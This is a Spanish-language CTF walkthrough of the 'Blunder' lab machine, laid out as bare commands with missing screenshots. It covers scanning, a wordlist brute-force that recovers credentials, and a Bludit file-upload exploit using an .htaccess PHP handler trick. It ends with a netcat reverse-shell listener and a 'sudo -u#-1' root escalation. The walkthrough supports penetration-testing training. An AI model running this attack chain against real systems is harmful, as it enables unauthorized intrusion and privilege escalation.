nmap -A -p- -oA output 10.129.95.225 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA blunder 10.129.95.225

nmap -sU -O -p- -oA blunder-udp 10.129.95.225

nikto -h 10.129.95.225:80

Pasted image 20220129171610.png

Pasted image 20220129171727.png

whatweb http://10.129.95.225

Pasted image 20220129171855.png

searchsploit bludit

Pasted image 20220129172110.png

http://10.129.95.225

Pasted image 20220129172216.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.95.225/FUZZ

Pasted image 20220129172814.png

http://10.129.95.225/admin

Pasted image 20220129172835.png

http://10.129.95.225/todo.txt

Pasted image 20220129173344.png

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.129.95.225/FUZZ" -e .txt -t 30

Pasted image 20220129173639.png Pasted image 20220129173702.png

cewl -w dictionary.txt http://10.129.95.225

Pasted image 20220129184022.png

python3 bruteforcer.py

Credenciales-> fergus:RolandDeschain

Pasted image 20220129184449.png

http://10.129.95.225/admin/dashboard

Pasted image 20220129184523.png

cat bruteforcer.py

Pasted image 20220129184807.png Pasted image 20220129184830.png

searchsploit -m 48701

Pasted image 20220129185023.png

cat bludit_exploit.py

cat evil.png

Pasted image 20220129191440.png

echo "RewriteEngine off" > .htaccess

echo "Addtype application/x-httpd-php .png" >> .htaccess

python3 bludit exploit.py

Pasted image 20220129191927.png

http://10.129.95.225/bl-content/tmp/temp/

Pasted image 20220129192243.png

nc -lvnp 443

Pasted image 20220130203407.png

Credenciales-> hugo:Password120

Pasted image 20220130203554.png

su hugo

sudo -l

sudo -u\#-1 /bin/bash

Pasted image 20220130203823.png

boxes

copyright©2022 Cu3rv0x all rights reserved